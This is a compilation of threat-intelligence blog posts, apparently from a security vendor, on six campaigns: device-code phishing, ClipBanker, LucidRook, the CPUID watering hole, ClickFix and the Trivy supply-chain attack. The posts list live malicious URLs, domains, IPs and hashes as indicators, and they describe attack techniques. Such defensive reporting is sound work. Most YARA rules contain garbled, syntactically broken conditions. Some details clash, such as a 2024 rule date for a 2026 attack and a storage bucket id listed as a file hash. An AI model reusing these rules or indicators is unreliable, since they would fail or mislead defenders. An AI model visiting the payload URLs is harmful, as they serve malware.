The threat landscape for credential theft is shifting from static, proxy-based phishing toward sophisticated, automated abuse of OAuth 2.0 authentication flows. Recent intelligence from Microsoft Defender Security Research, supported by SecLookup’s active telemetry, has identified a widespread phishing campaign leveraging the EvilTokens Phishing-as-a-Service (PhaaS) toolkit. This campaign is a significant escalation from previous activity observed under the Storm-2372 umbrella. By integrating Generative AI for hyper-personalized lures and dynamic backend automation via platforms like Railway.com, threat actors have effectively circumvented traditional security controls—specifically the 15-minute expiration window of device codes. SecLookup has been actively tracking and blocking the infrastructure associated with this campaign, including key domains and ephemeral IP ranges used for polling and token exfiltration.

Threat Analysis: The Move to AI-Enabled Automation

The core of this campaign lies in the abuse of the Device Code Flow (RFC 8628), an authentication method originally designed for devices with limited input capabilities, such as smart TVs or IoT devices. While device code phishing is not a new technique, the current campaign introduces three critical innovations that increase its success rate and scale.

1. Dynamic Code Generation

In traditional device code attacks, threat actors generated a code and sent it to a victim. However, these codes typically expire within 15 minutes. If a victim did not click the link and enter the code immediately, the attack would fail.

The EvilTokens toolkit solves this by using "just-in-time" generation. The phishing link does not contain a pre-generated code; instead, when a victim interacts with the malicious landing page, a backend Node.js script triggers a request to the identity provider (e.g., Microsoft Entra ID) to generate a fresh device code in real-time. This ensures that the 15-minute window only begins at the moment of human interaction, drastically increasing the window of opportunity for the attacker.

2. AI-Driven Personalization

The campaign utilizes Generative AI to move beyond generic "Urgent Action Required" templates. Threat actors are generating hyper-personalized lures tailored to the victim’s specific job role and organizational context. SecLookup has identified themes revolving around:

• Request for Proposals (RFPs): Targeted at sales and business development teams.

• Manufacturing Workflows: Targeted at operations and supply chain personnel.

• Unpaid Invoices: Targeted at finance and accounts payable departments.

By using LLMs to craft these emails, the attackers eliminate common indicators of phishing, such as poor grammar or awkward phrasing, making the lure highly convincing.

3. Ephemeral Infrastructure via Railway.com

To manage thousands of concurrent authentication flows, the threat actors utilized Railway.com, a cloud platform for deploying applications. This allowed them to spin up thousands of unique, short-lived polling nodes. These nodes run Node.js logic that constantly "polls" the identity provider to check if the victim has completed the device code entry.

Using legitimate cloud infrastructure helps the attackers bypass signature-based detections and domain reputation filters, as the traffic often originates from reputable IP ranges. SecLookup's engine, however, focuses on behavioral heuristics and has successfully flagged these nodes by identifying the specific polling patterns associated with EvilTokens.

MITRE ATT&CK Mapping

The TTPs observed in this campaign map to the following MITRE ATT&CK techniques:

SecLookup Detection and Prevention

SecLookup’s threat intelligence platform was actively detecting and blocking the primary infrastructure used in this campaign before the public disclosure of the Microsoft report. Our automated scanners identified the domain a7b2-c9d4.office-verify.net as a high-risk entity due to its registration patterns and its association with the EvilTokens toolkit.

By monitoring for specific Node.js polling behaviors and identifying the unique entropy in the subdomains generated for this campaign, SecLookup provides real-time protection. Customers using our API or integrated SOC tools were protected from the moment these domains were activated.

Indicators of Compromise (IOCs)

Confirmed Malicious Domains

The following domain was used as a primary landing page for the device code phishing attempts:

a7b2-c9d4.office-verify.net

IP Addresses

These IP addresses have been identified as part of the polling and exfiltration infrastructure:

89.150.45.0
160.220.232.0
160.220.234.0
185.81.113.0

Detection Rules

Phish_DeviceCode_Campaign_IOCs This rule targets the specific domain patterns and string identifiers found in the landing pages of this campaign.

rule Phish_DeviceCode_Campaign_IOCs {
    meta:
        description = "Detects infrastructure and identifiers associated with AI-enabled device code phishing campaigns"
        threat_name = "Inside an AI‑enabled device code phishing campaign"
        reference = "Microsoft Defender Security Research"
    strings:
        $domain1 = "a7b2-c9d4.office-verify.net" ascii wide nocase
        $domain2 = "office-verify.net" ascii wide nocase
        $s1 = "device code" ascii wide nocase
        $s2 = "verification_uri" ascii wide nocase
        $s3 = "user_code" ascii wide nocase
    condition:
        any of (\(domain*) or (2 of (\)s*))
}

PhaaS_EvilTokens_Toolkit_Indicators This rule identifies the core toolkit logic and actor-specific markers observed in the backend automation.

rule PhaaS_EvilTokens_Toolkit_Indicators {
    meta:
        description = "Detects references to the EvilTokens PhaaS toolkit and associated infrastructure patterns"
        threat_actor = "Storm-2372"
    strings:
        $toolkit = "EvilTokens" ascii wide nocase
        $actor = "Storm-2372" ascii wide nocase
        $infra = "railway.com" ascii wide nocase
        $logic = "Node.js" ascii wide nocase
        $flow = "device code authentication flow" ascii wide nocase
    condition:
        \(toolkit or \)actor or (\(infra and \)flow and $logic)
}

Recommendations

To defend against AI-enabled device code phishing, SecLookup recommends the following defensive measures:

1. Restrict Device Code Flow: If your organization does not require device code authentication for IoT or legacy devices, disable it within your Identity Provider (IdP) settings (e.g., Microsoft Entra ID).

2. Implement Conditional Access: Use Conditional Access policies to restrict where device code flow can be initiated. For example, require the device to be on a trusted network or a compliant, managed device.

3. Enforce FIDO2 MFA: Move toward phishing-resistant multi-factor authentication (MFA) such as FIDO2 security keys. These methods are not susceptible to the token theft techniques used in device code phishing.

4. Monitor for Suspicious Polling: SOC analysts should hunt for high frequencies of sign-in attempts from ephemeral cloud hosting IP ranges (Railway, AWS, etc.) using the "Device Code" authentication method.

5. User Awareness Training: Update phishing simulations to include device code flow scenarios. Most users are trained to look for password fields; they may not realize that entering a code into a "Microsoft verification" page is equally dangerous.

References

• Inside an AI‑enabled device code phishing campaign by Microsoft Defender Security Research Team, Microsoft Security Blog

Threat actors are increasingly leveraging trusted developer tools and open-source platforms to bypass traditional security perimeters. Recently, SecLookup tracked a sophisticated campaign distributing the ClipBanker malware through trojanized versions of "Proxifier," a popular network utility. This campaign is notable for its "marathon" infection chain, utilizing multi-stage execution, process injection, and "exotic" defense evasion techniques. By abusing GitHub Releases and employing specialized PowerShell execution methods, the attackers successfully circumvented Microsoft Defender to deploy a clipboard-swapping module designed to steal cryptocurrency. SecLookup’s threat intelligence platform has been actively detecting and blocking the malicious infrastructure associated with this campaign, including the primary command-and-control (C2) domain maper.info.

Threat Analysis: The Infection Lifecycle

The ClipBanker campaign begins with a classic social engineering tactic: SEO poisoning and the exploitation of developer trust.

Stage 1: Initial Access and Delivery

The infection typically starts with a user searching for "Proxifier" via a web search engine. The attackers successfully positioned a malicious GitHub repository near the top of the search results. While the repository itself contains a rudimentary, legitimate-looking proxy service, the Releases section contains the payload: a ZIP archive containing a malicious executable and a text file with "activation keys."

The executable is a malicious wrapper. When launched, it installs the legitimate Proxifier software to maintain the illusion of functionality while simultaneously initiating a silent, multi-stage infection in the background.

Stage 2: Exotic Defense Evasion

The malware's primary objective upon execution is to disable security protections. To avoid detection by Microsoft Defender, the Trojan employs a sophisticated multi-step process:

1. The Donor Process: The Trojan creates a 1.5 KB stub file in the temporary directory (named Proxifier<???>.tmp). This file is functionally benign and serves only as a "donor" process.

2. Process Injection: A .NET-based component named api_updater.exe is injected into the running donor stub.

3. In-Memory PowerShell Execution: To set Defender exclusions without triggering command-line logging or spawning powershell.exe, the malware uses the PSObject class within the .NET environment. This allows the script to run directly within the current process memory.

The PowerShell script executed via PSObject specifically adds exclusions for all .tmp extensions and the current working directory, effectively creating a "blind spot" for the next stages of the malware to operate within.

Stage 3: The ClipBanker Payload

Once the environment is prepared and defenses are impaired, the trojanized installer extracts and launches the final payload. ClipBanker is a specialized Trojan that monitors the system clipboard for patterns matching cryptocurrency wallet addresses (Bitcoin, Ethereum, etc.). When a match is found, the malware replaces the user's intended destination address with one controlled by the attacker. This results in the user inadvertently sending funds to the threat actor during a transaction.

MITRE ATT&CK Mapping

SecLookup Detection and Protection

SecLookup’s threat intelligence engine has been actively monitoring the infrastructure supporting this ClipBanker campaign. Our platform identified the domain maper.info as a critical component of the distribution and command chain.

SecLookup users were protected via:

• Real-time Domain Blocking: The domain maper.info was flagged as malicious and blocked across protected endpoints.

• Hash Identification: The specific file hashes for api_updater.exe and the trojanized Proxifier wrappers were added to our global blacklist.

• Behavioral Heuristics: Our platform detects the specific sequence of adding Defender exclusions via unconventional PowerShell callers.

Indicators of Compromise (IOCs)

The following indicators have been identified and confirmed as part of this campaign.

Malicious Domains

maper.info

File Hashes

d85cef60cdb9e8d0f3cb3546de6ab657f9498ac7
8354223cd6198b05904337b5dff7772b
7528bf597fd7764fcb7ec06512e073e0
107484d66423cb601f418344cd648f12
34a0f70ab100c47caaba7a5c85448e3d
97c16182d2e91a9370d5590b670f6b8dc755680552e40218a2b28ec7ad105071

Network URLs

https://pinhole.rootcode.ru/rogers7/dev-api/raw/master/cpzn
https://chiaselinks.com/raw/nkkywvmhux
https://maper.info/2X5tF5
https://gist.github.com/msfcon5ol3/107484d66423cb601f418344cd648f12/raw/d85cef60cdb9e8d0f3cb3546de6ab657f9498ac7/upxz
https://git.parat.swiss/rogers7/dev-api/raw/master/cpzn
https://snippet.host/aaxniv/raw
https://github.com/lukecodix/Proxifier/releases/download/4.12/Proxifier.zip
https://pastebin.com/raw/FmpsDAtQ
https://paste.kealper.com/raw/k3K5aPJQ
https://rlim.com/55Dfq32kaR/raw

Detection Rules

YARA Rules

The following YARA rules can be used to hunt for artifacts associated with this ClipBanker campaign in your environment.

rule Trojan_ClipBanker_Defender_Exclusion {
    meta:
        description = "Detects malicious .NET behavior adding Defender exclusions for .tmp extensions using PSObject"
        author = "SecLookup Threat Intel"
        threat_name = "ClipBanker"
    strings:
        $s1 = "Add-MpPreference" wide ascii
        $s2 = "-ExclusionExtension" wide ascii
        $s3 = ".tmp" wide ascii
        $s4 = "-ExclusionPath" wide ascii
        $p1 = "System.Management.Automation.PSObject" wide ascii
        $f1 = "api_updater.exe" wide ascii
    condition:
        uint16(0) == 0x5A4D and (all of (\(s*) or (3 of (\)s*) and (\(p1 or \)f1)))
}

rule Trojan_ClipBanker_Infection_Artifacts {
    meta:
        description = "Detects specific file names and indicators associated with the ClipBanker infection chain"
        author = "SecLookup Threat Intel"
        reference = "maper.info"
    strings:
        $url = "maper.info" wide ascii
        $f1 = "api_updater.exe" wide ascii
        $f2 = "proxifier.exe" wide ascii
        $f3 = "Proxifier" wide ascii
        $tmp = /Proxifier.{1,10}\.tmp/ wide ascii
    condition:
        uint16(0) == 0x5A4D and (\(url or (\)f1 and \(f2) or \)tmp)
}

Recommendations

To mitigate the risk of ClipBanker and similar trojanized software campaigns, SecLookup recommends the following actions:

1. Software Vetting: Always download software from official, verified vendor websites rather than third-party GitHub repositories or unofficial mirrors.

2. Monitor Defender Exclusions: Regularly audit Microsoft Defender exclusion lists. Malicious additions to -ExclusionExtension or -ExclusionPath are high-fidelity indicators of compromise.

3. Endpoint Detection and Response (EDR): Deploy EDR solutions capable of detecting in-memory PowerShell execution (e.g., via PSObject or Reflection) and process injection into unusual stubs in the %TEMP% directory.

4. Clipboard Monitoring: For high-value workstations (e.g., those used for crypto transactions), consider security tools that alert on unauthorized clipboard modifications.

5. Block Malicious Infrastructure: Ensure your DNS and firewall solutions are updated with the IOCs provided above, specifically blocking maper.info and known "raw paste" service URLs used for C2.

References

• The long road to your crypto: ClipBanker and its marathon infection chain by Oleg Kupreev, Securelist (Kaspersky GReAT)

The threat landscape in East Asia continues to evolve with the emergence of highly specialized toolkits designed to evade traditional heuristic detections. Recently, Cisco Talos identified a sophisticated campaign attributed to a threat actor tracked as UAT-10362. This actor has been observed targeting Taiwanese non-governmental organizations (NGOs) and academic institutions using a multi-stage infection chain. The primary payload, dubbed LucidRook, represents a shift toward modular, multi-language malware, utilizing a Lua interpreter embedded within Rust-compiled libraries. Supported by a dropper known as LucidPawn and a reconnaissance tool called LucidKnight, UAT-10362 demonstrates mature operational tradecraft characterized by region-specific anti-analysis checks and the abuse of legitimate public infrastructure.

SecLookup’s threat intelligence platform has been actively tracking this activity, successfully identifying and blocking the command-and-control (C2) infrastructure and associated malicious artifacts to protect our global user base.

Campaign Overview

The campaign, first detected in late 2025, primarily leverages spear-phishing as its initial access vector. Threat actors utilize authorized mail infrastructure to send emails containing shortened URLs, which redirect victims to password-protected archives.

To increase the likelihood of execution, UAT-10362 employs highly convincing decoy documents. One observed decoy involves a formal directive purportedly from the Taiwanese government regarding travel regulations for university staff visiting mainland China. This level of social engineering indicates a deep understanding of the local socio-political context and the specific concerns of the targeted academic and NGO sectors.

Technical Analysis: The Lucid Toolkit

The architecture of the UAT-10362 toolkit is tiered and modular, allowing the actor to profile victims before deploying their most sophisticated tools.

LucidPawn: The Regional Gatekeeper

The initial dropper, LucidPawn, is designed with stealth as a priority. It frequently impersonates legitimate security software, such as Trend Micro’s "Cleanup.exe." A key feature of LucidPawn is its region-specific execution logic. The malware performs environment checks to ensure it is running in a Traditional Chinese language environment (specifically zh-TW). If these conditions are not met, the malware terminates, effectively neutralizing analysis attempts in generic sandbox environments or by researchers outside the target region.

LucidRook: The Lua-Based Stager

The core of the infection is LucidRook, a sophisticated stager. LucidRook is unique in its implementation, using a DLL that embeds a Lua 5.4.8 interpreter along with Rust-compiled libraries.

The stager’s primary role is to download and execute staged Lua bytecode payloads. By using Lua—a scripting language often overlooked by legacy antivirus solutions—the actor can execute complex logic in memory while maintaining a small disk footprint. The use of Rust for the underlying libraries further complicates reverse engineering due to the language’s unique memory management and symbol handling.

LucidKnight: Reconnaissance and Exfiltration

During the investigation, a companion tool named LucidKnight was discovered. LucidKnight serves as a specialized reconnaissance agent. It is designed to harvest system information and exfiltrate it via the Gmail API. The presence of LucidKnight suggests a "scout" model, where the actor first determines the value of a compromised host before escalating to the full deployment of LucidRook for long-term persistence or data theft.

Infrastructure and C2 Tradecraft

UAT-10362 demonstrates a preference for blending into legitimate traffic. Their infrastructure strategy includes:

• OAST Service Abuse: Utilizing Out-of-band Application Security Testing services for initial callback signals.

• Compromised FTP Servers: Repurposing legitimate, compromised FTP servers to host malicious payloads, reducing the likelihood of domain-based blocking.

• Public Cloud Services: Using Gmail for exfiltration (LucidKnight) to bypass outbound traffic restrictions that might block unknown C2 IPs.

SecLookup Detection and Response

SecLookup’s proactive threat hunting team has been monitoring the infrastructure associated with UAT-10362. Our platform successfully identified the domain digimg.store and its subdomains as high-risk early in the campaign cycle.

Through our multi-layered analysis, SecLookup was able to correlate these domains with the LucidRook infection chain. Our users were protected via automated blocking of these domains and the associated malicious IP addresses. We continue to ingest telemetry from these campaigns to refine our detection signatures for Lua-based execution patterns and Rust-compiled malicious DLLs.

MITRE ATT&CK Mapping

The tactics and techniques employed by UAT-10362 align with the following MITRE ATT&CK framework categories:

Indicators of Compromise (IOCs)

Domains

d.2fcc7078.digimg.store
digimg.store

IP Addresses

1.34.253.131
59.124.71.242

File Hashes (SHA-256)

d49761cdbea170dd17255a958214db392dc7621198f95d5eb5749859c603100a
7e851b73bd59088d60101109c9ebf7ef300971090c991b57393e4c793f5e2d33
b480092d8e5f7ca6aebdeaae676ea09281d07fc8ccf2318da2fa1c01471b818d
f279e462253f130878ffac820f5a0f9ac92dd14ad2f1e4bd21062bab7b99b839
aa7a3e8b59b5495f6eebc19f0654b93bb01fd2fa2932458179a8ae85fb4b8ec1
6aba7b5a9b4f7ad4203f26f3fb539911369aeef502d43af23aa3646d91280ad9
a42ad963c53f2e0794e7cd0c3632cc75b98f131c3ffceb8f2f740241c097214a
d8bc6047fb3fd4f47b15b4058fa482690b5b72a5e3b3d324c21d7da4435c9964
852a80470536cb1fdab1a04d831923616bf00c77320a6b4656e80fc3cc722a66
166791aac8b056af8029ab6bdeec5a2626ca3f3961fdf0337d24451cfccfc05d
0305e89110744077d8db8618827351a03bce5b11ef5815a72c64eea009304a34
ab72813444207dba5429cf498c6ffbc69e1bd665d8007561d0973246fa7f8175
bdc5417ffba758b6d0a359b252ba047b59aacf1d217a8b664554256b5adb071d
11ae897d79548b6b44da75f7ab335a0585f47886ce22b371f6d340968dbed9ae
fd11f419e4ac992e89cca48369e7d774b7b2e0d28d0b6a34f7ee0bc1d943c056

Email Addresses

crimsonanabel@powerscrews.com
fexopuboriw972@gmail.com

Detection Rules

YARA Rules

rule LucidRook_Stager_DLL {
    meta:
        description = "Detects LucidRook DLL stager based on Lua interpreter version and specific stage filename."
        author = "SecLookup Analysis"
    strings:
        $lua_ver = "Lua 5.4.8"
        $payload = "archive1.zip"
        $rust_marker = "/rustc/"
        $dll_name = "DismCore.dll" ascii wide
    condition:
        uint16(0) == 0x5A4D and (all of (\(lua_ver, \)payload) or (\(dll_name and \)rust_marker))
}

rule LucidPawn_Dropper_Activity {
    meta:
        description = "Detects LucidPawn dropper artifacts and specific LOLBAS execution patterns."
        author = "SecLookup Analysis"
    strings:
        $pester_path = "\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Build.bat" ascii wide
        $appdata_path = "\\Local\\Microsoft\\WindowsApps\\msedge.exe" ascii wide
        $mal_dll = "DismCore.dll" ascii wide
    condition:
        uint16(0) == 0x5A4D and any of them
        or (any of (\(pester_path, \)appdata_path) and $mal_dll)
}

rule Lucid_Cleanup_Dropper_Impersonation {
    meta:
        description = "Detects the .NET dropper Cleanup.exe impersonating Trend Micro."
        author = "SecLookup Analysis"
    strings:
        $tm_impersonation = "Trend Micro™ Worry-Free™ Business Security Services" wide
        $cleanup_name = "Cleanup.exe" ascii wide
        $msg_box = "Cleanup process has completed" wide
    condition:
        uint16(0) == 0x5A4D and (\(tm_impersonation and (\)cleanup_name or $msg_box))
}

Recommendations

To defend against UAT-10362 and similar threats, security teams should implement the following measures:

1. Enhance Email Filtering: Deploy advanced email security solutions capable of decompressing and analyzing password-protected archives when the password is provided in the email body.

2. Endpoint Monitoring: Monitor for unusual child processes spawning from legitimate Windows utilities, specifically focusing on Pester framework scripts and unexpected Lua interpreter executions.

3. Language Environment Vigilance: While primarily relevant for regional targets, security teams should be aware that environmental checks (like OS language) are used to evade sandboxes. Ensure automated analysis platforms are configured to simulate various regional locales.

4. Credential Management: Implement strict Multi-Factor Authentication (MFA) to prevent actors from utilizing authorized mail infrastructure even if credentials are compromised.

5. Block Known IOCs: Ensure the domains, IPs, and hashes listed in this report are integrated into your SIEM, EDR, and firewall blocklists.

References

• New Lua-based malware “LucidRook” observed in targeted attacks against Taiwanese organizations by Ashley Shen, Cisco Talos

On April 9, 2026, threat actors successfully executed a high-impact watering hole attack targeting the official CPUID website, a primary source for popular system diagnostic utilities like CPU-Z and HWMonitor. By compromising a secondary API feature, the attackers were able to manipulate download links for approximately 19 hours, redirecting unsuspecting users to malicious domains. These domains served trojanized installers that deployed the STX Remote Access Trojan (RAT) through sophisticated DLL sideloading techniques.

SecLookup’s threat intelligence platform was actively monitoring this infrastructure and had already flagged the primary distribution domains as malicious, protecting our users from potential compromise. This post provides a technical deep dive into the campaign’s TTPs, the malware’s execution chain, and comprehensive indicators of compromise (IOCs).

Threat Analysis: The CPUID Compromise

The attack on CPUID represents a classic watering hole strategy, where attackers compromise a trusted site frequently visited by their target demographic—in this case, IT professionals, gamers, and system administrators.

Initial Access and Redirection

According to investigations by the CPUID maintainers and external researchers, the breach occurred through a "secondary feature" or side API. Between April 9 at 15:00 UTC and April 10 at 10:00 UTC, this compromised API caused the main website to intermittently display download links pointing to external, malicious infrastructure rather than the legitimate CPUID servers.

The attackers utilized several domains for hosting the malicious payloads, including:

• vatrobran[.]hr

• cahayailmukreatif.web[.]id

• transitopalermo[.]com

• pub-45c2577dbd174292a02137c18e7b1b5a.r2[.]dev (Cloudflare R2 storage)

STX RAT Execution via DLL Sideloading

The redirected download links provided users with what appeared to be standard installers for CPU-Z or HWMonitor. However, these installers were trojanized. The primary mechanism for infection was DLL Sideloading (MITRE ATT&CK T1574.002).

The malicious package included a legitimate, signed application alongside a rogue DLL named CRYPTBASE.dll. When the legitimate executable is launched, it attempts to load the necessary CRYPTBASE.dll from its local directory before searching system folders. The malicious version of the DLL contained the STX RAT payload and was responsible for:

1. Anti-Analysis Checks: The DLL performed checks to determine if it was running in a sandbox or virtualized environment.

2. Persistence: Establishing hooks into the system to ensure the RAT survived reboots.

3. C2 Communication: Connecting back to attacker-controlled infrastructure to receive commands.

Infrastructure Reuse

A notable finding in this campaign is the reuse of infrastructure. The C2 addresses and distribution patterns identified in this attack overlap significantly with previous campaigns distributing fake FileZilla installers. This suggests that the threat actor behind this campaign is either part of an established cybercrime syndicate or is utilizing a "malware-as-a-service" (MaaS) kit that includes pre-configured infrastructure.

MITRE ATT&CK Mapping

SecLookup Detection

SecLookup’s proactive threat hunting engine identified the malicious nature of the redirect domains shortly after the campaign began. Our platform confirmed that cahayailmukreatif.web.id was associated with malware distribution.

Indicators of Compromise (IOCs)

Domains

cahayailmukreatif.web.id
vatrobran.hr
transitopalermo.com
pub-45c2577dbd174292a02137c18e7b1b5a.r2.dev

File Hashes (MD5/ID)

45c2577dbd174292a02137c18e7b1b5a

Detection Rules

YARA Rules

The following rules can be used to scan for the malicious DLL and trojanized installers within your environment.

rule STX_RAT_CPUID_Malicious_DLL {
    meta:
        description = "Detects malicious CRYPTBASE.dll used in the CPUID watering hole attack to sideload STX RAT"
        author = "Threat Intel Analysis"
        date = "2024-05-22"
        reference = "CPUID Watering Hole Attack"
    strings:
        $dll_name = "CRYPTBASE.dll" ascii wide
        $domain1 = "vatrobran.hr" ascii wide
        $domain2 = "cahayailmukreatif.web.id" ascii wide
        $domain3 = "transitopalermo.com" ascii wide
        $domain4 = "pub-45c2577dbd174292a02137c18e7b1b5a.r2.dev" ascii wide
    condition:
        uint16(0) == 0x5A4D and (\(dll_name and 1 of (\)domain*))
}

rule CPUID_Trojanized_Installer_Indicators {
    meta:
        description = "Detects strings related to trojanized CPU-Z or HWMonitor installers used in STX RAT campaign"
    strings:
        $s1 = "CPU-Z" ascii wide
        $s2 = "HWMonitor" ascii wide
        $s3 = "CPUID" ascii wide
        $m1 = "CRYPTBASE.dll" ascii wide
        $m2 = "vatrobran.hr" ascii wide
    condition:
        uint16(0) == 0x5A4D and (1 of (\(s*) and 1 of (\)m*))
}

Recommendations

To mitigate the risk posed by this and similar watering hole attacks, SecLookup recommends the following actions:

1. Verify Software Signatures: Always check the digital signature of downloaded executables. In this campaign, while the legitimate CPUID files were signed, the trojanized installers often lacked valid signatures or were signed by unrelated third parties.

2. Monitor for DLL Sideloading: Implement endpoint monitoring (EDR) to alert on unusual DLL loads, particularly CRYPTBASE.dll appearing in non-system directories like Downloads or AppData\Local\Temp.

3. Application Whitelisting: Restrict the execution of administrative tools to authorized personnel and ensure they are sourced from internal, verified repositories rather than direct web downloads.

4. Network Filtering: Ensure your DNS and web proxy solutions are ingesting real-time threat intelligence feeds from SecLookup to block access to newly registered or compromised domains used in malware campaigns.

5. User Education: Remind employees and IT staff that even trusted sites can be compromised and to report any unusual behavior (e.g., unexpected redirects or certificate errors) during software downloads.

References

• CPUID watering hole attack spreads STX RAT malware by Pierluigi Paganini, Security Affairs

The threat landscape is witnessing a sophisticated shift in initial access delivery through a social engineering technique known as "ClickFix." Recent investigations into campaign clusters active since May 2024 reveal a highly effective methodology designed to bypass traditional browser security controls and endpoint detection. By impersonating trusted platforms like Intuit QuickBooks and Booking.com, threat actors are tricking users into executing malicious, obfuscated commands directly within native system tools such as the Windows Run dialog box and the macOS Terminal. This "Living-off-the-Land" (LotL) approach represents a significant evolution in cross-platform targeting, moving beyond simple credential harvesting to direct system compromise. SecLookup has been actively monitoring these developments, and our threat intelligence platform has successfully identified and blocked the infrastructure associated with these multi-stage attacks.

Threat Analysis: The Mechanics of ClickFix

The ClickFix technique relies on a fundamental psychological exploit: the "fix-it" reflex. When a user encounters a purported technical error—such as a failed document load, a browser incompatibility, or a security certificate issue—they are primed to follow instructions to resolve the problem.

Technical Workflow and TTPs

The attack sequence typically begins with a compromised website or a dedicated malicious domain that serves a convincing lure. Insikt Group’s analysis highlights five distinct clusters of activity, showing that while the lures vary, the core mechanism remains consistent.

1. Infrastructure and Lures: Attackers deploy domains that mimic support or help desks (e.g., account-help.info). These sites often use lures relevant to high-value targets in accounting, legal services, and real estate. A prominent example includes fake Intuit QuickBooks update pages or Booking.com notification errors.
2. OS Detection and Delivery: The malicious landing pages employ technical sophistication by fingerprinting the visitor's operating system. This allows the campaign to serve tailored execution chains. If a Windows user is detected, the site provides a "fix" involving the Windows Run dialog. If a macOS user is detected, the instructions pivot to the macOS Terminal.
3. The "ClickFix" Interaction: Instead of a traditional file download (which might be flagged by the browser or EDR), the user is prompted to click a button to "copy the fix" to their clipboard. This "fix" is actually a heavily obfuscated PowerShell command (for Windows) or an AppleScript/Bash command (for macOS).
4. User-Driven Execution: The site provides step-by-step visual instructions:
   • Windows: Press Win + R, paste the clipboard content (Ctrl + V), and hit Enter.
   • macOS: Open Terminal, paste the content (Cmd + V), and hit Enter.
5. Bypassing Defense: Because the command is executed directly by the user through a native OS utility, it bypasses many browser-based security sandboxes. The execution occurs in-memory, minimizing the disk footprint and evading traditional signature-based antivirus solutions.

MITRE ATT&CK Mapping

The ClickFix campaigns utilize several tactics and techniques within the MITRE ATT&CK framework:

• Initial Access: Phishing (T1566) and Drive-by Compromise (T1189).
• Execution: User Execution: Malicious Command (T1204.001), Command and Scripting Interpreter: PowerShell (T1059.001), and Command and Scripting Interpreter: AppleScript (T1059.002).
• Defense Evasion: Obfuscated Files or Information (T1027) and Living-off-the-Land (T1218).

SecLookup Detection and Global Intelligence

SecLookup’s threat intelligence engine has been tracking the infrastructure associated with ClickFix clusters since their emergence. Our platform utilizes advanced HTML content analysis and behavioral heuristic modeling to identify malicious web artifacts before they are widely reported.

During the lifecycle of these campaigns, SecLookup was actively detecting and blocking the malicious domains used in the redirection chains and payload hosting. By correlating IP addresses and domain registration patterns, SecLookup provided real-time protection to our users, neutralizing the social engineering lures before they could facilitate host-level compromise. Our telemetry consistently flagged the infrastructure used in the QuickBooks and Booking.com impersonation clusters as high-risk, enabling SOC teams to proactively harden their environments.

Indicators of Compromise (IOCs)

The following indicators have been identified across the various ClickFix clusters. We recommend that organizations ingest these into their SIEM and EDR platforms for immediate blocking and hunting.

Confirmed Malicious Domains

account-help.info
account-helpdesk.icu
account-helpdesk.top
macxapp.org
mrinmay.net

IP Addresses

62.164.177.230
94.156.112.115
193.222.99.212
45.144.233.192
77.91.65.31
193.58.122.97
45.93.20.141
77.91.65.144
152.89.244.70
193.35.17.12
45.93.20.50
91.202.233.206
87.236.16.20

File Hashes (SHA-256)

c0af6e9d848ada3839811bf33eeb982e6c207e4c40010418e0185283cd5cff50
43907e54cf3d1258f695d1112759b5457576481072cc76a679b8477cfeb3db87
397dcea810f733494dbe307c91286d08f87f64aebbee787706fe6561ed3e20f8
b17c3e4058aacdcc36b18858d128d6b3058e0ea607a4dc59eb95b18b7c6acc7c
5d821db386c7c879caeabf3e9f94c94a48eec6ec5a3a0efbae9d69da3f52c1db

Recommendations for Defense

While indicator blocking is essential, the transition of ClickFix into a standardized template for both cybercriminals and APTs necessitates a strategy centered on behavioral hardening.

Technical Hardening

1. Restrict System Utilities: For Windows environments, evaluate the necessity of the Run dialog box. If it is not required for daily business operations, it can be disabled via Group Policy Objects (GPO).
2. PowerShell Security: Implement PowerShell Constrained Language Mode (CLM) to limit the capability of malicious scripts. Ensure that PowerShell logging (Script Block Logging and Transcription) is enabled and forwarded to a centralized SIEM for analysis.
3. Terminal Restrictions: For macOS, utilize Mobile Device Management (MDM) solutions to restrict or monitor the execution of unsigned scripts within the Terminal.
4. Clipboard Monitoring: While challenging to implement at scale, advanced EDR solutions can be configured to alert on unusual patterns of content being pasted into system shells, especially when originating from browser processes.

User Awareness and Training

Standard phishing simulations often focus on malicious attachments or links. Organizations should update their training modules to include:

• Interaction-Based Social Engineering: Educate users that no legitimate software support (Microsoft, Intuit, Apple) will ever ask them to copy and paste code into a Command Prompt, PowerShell, or Terminal window to "fix" a browser error.
• Reporting Procedures: Streamline the process for users to report "weird" browser pop-ups, even if they didn't follow the instructions.

Proactive Intelligence

Operationalize Digital Risk Protection (DRP) tools to monitor for domain registrations that typo-squat your brand or third-party vendors your organization relies upon. Early detection of look-alike domains can allow for preemptive blocking before a campaign reaches your users.

References

• ClickFix Campaigns Targeting Windows and macOS by Recorded Future, March 25, 2026.

On March 19, 2026, a highly sophisticated CI/CD-focused supply chain attack targeted Trivy, the widely adopted open-source vulnerability scanner maintained by Aqua Security. Attributed to the threat actor known as TeamPCP, the campaign leveraged compromised credentials from a previously under-remediated incident to inject malicious code into official distribution channels. By poisoning GitHub Actions and publishing weaponized binaries, the attackers successfully turned a trusted security tool into a vehicle for credential theft and persistence. This incident highlights the critical vulnerability of modern DevOps pipelines, where a single point of failure in a trusted dependency can lead to widespread organizational compromise. SecLookup was actively detecting and blocking the infrastructure associated with this threat prior to the public disclosure.

Threat Analysis

The TeamPCP campaign represents a calculated execution phase of a long-term operation. Rather than attempting to breach thousands of organizations individually, the actors compromised the tooling those organizations use to secure themselves. This "watering hole" approach in the CI/CD space is particularly effective because security scanners like Trivy often run with elevated permissions to access container registries, source code, and cloud environments.

TTPs: CI/CD Pipeline Poisoning

The primary vector for this compromise involved the manipulation of GitHub Actions. TeamPCP gained access to credentials with tag write permissions for the aquasecurity/trivy-action and aquasecurity/setup-trivy repositories.

The attackers utilized a "force-push" technique against existing version tags. In GitHub Actions, many developers reference versions using tags (e.g., uses: aquasecurity/trivy-action@v1). By force-pushing 76 of 77 version tags, TeamPCP redirected these trusted references to malicious commits containing their payload. Because the version number remained unchanged, downstream workflows automatically pulled the malicious code without triggering any alerts or requiring manual updates from the end-user.

Malicious Binary Distribution

Simultaneously, the actors weaponized the release automation process. They triggered the publication of a malicious Trivy binary, specifically version v0.69.4. This version was distributed through official GitHub Releases and container registries. The infected binary contained a credential-stealing module designed to intercept:

• Cloud provider credentials (AWS, Azure, GCP)

• GitHub Personal Access Tokens (PATs)

• Environment variables stored in CI/CD secrets

• Container registry authentication tokens

Infrastructure and Typosquatting

To facilitate Command and Control (C2) and exfiltration, TeamPCP deployed a combination of typosquatted domains and decentralized infrastructure. The domain aquasecurtiy.org (note the transposed 'i' and 't') was used to mimic official communication channels and host malicious scripts.

